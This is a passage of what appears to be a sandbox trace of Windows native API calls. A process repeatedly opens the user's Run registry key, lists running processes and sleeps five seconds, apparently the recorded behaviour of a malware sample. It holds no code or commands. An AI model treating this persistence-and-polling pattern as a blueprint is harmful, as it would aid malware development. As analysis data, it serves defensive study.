TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.733] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.733] NtClose (Handle=0x378) returned 0x0 [0311.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.747] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.749] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.751] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.751] NtClose (Handle=0x378) returned 0x0 [0311.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.959] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.960] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.960] NtClose (Handle=0x378) returned 0x0 [0311.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.971] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.977] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.978] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.978] NtClose (Handle=0x378) returned 0x0 [0311.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0311.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0311.987] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0311.990] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0311.991] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0311.992] NtClose (Handle=0x378) returned 0x0 [0311.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0311.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0311.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0311.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0311.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.003] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.008] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.009] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.009] NtClose (Handle=0x378) returned 0x0 [0312.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0312.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.018] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.081] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.082] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.083] NtClose (Handle=0x378) returned 0x0 [0312.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0312.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.092] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.101] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.102] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.102] NtClose (Handle=0x378) returned 0x0 [0312.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0312.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.343] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.352] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.356] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.356] NtClose (Handle=0x378) returned 0x0 [0312.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0312.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.371] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.377] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.379] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.379] NtClose (Handle=0x378) returned 0x0 [0312.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0312.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.396] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.398] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.398] NtClose (Handle=0x378) returned 0x0 [0312.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0312.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.418] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.430] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.432] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.432] NtClose (Handle=0x378) returned 0x0 [0312.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0312.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.444] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.456] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.457] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.458] NtClose (Handle=0x378) returned 0x0 [0312.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0312.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0312.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0312.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0312.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0312.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0312.471] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0312.512] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0312.516] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0312.516] NtClose (Handle=0x378) returned 0x0 [0312.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, 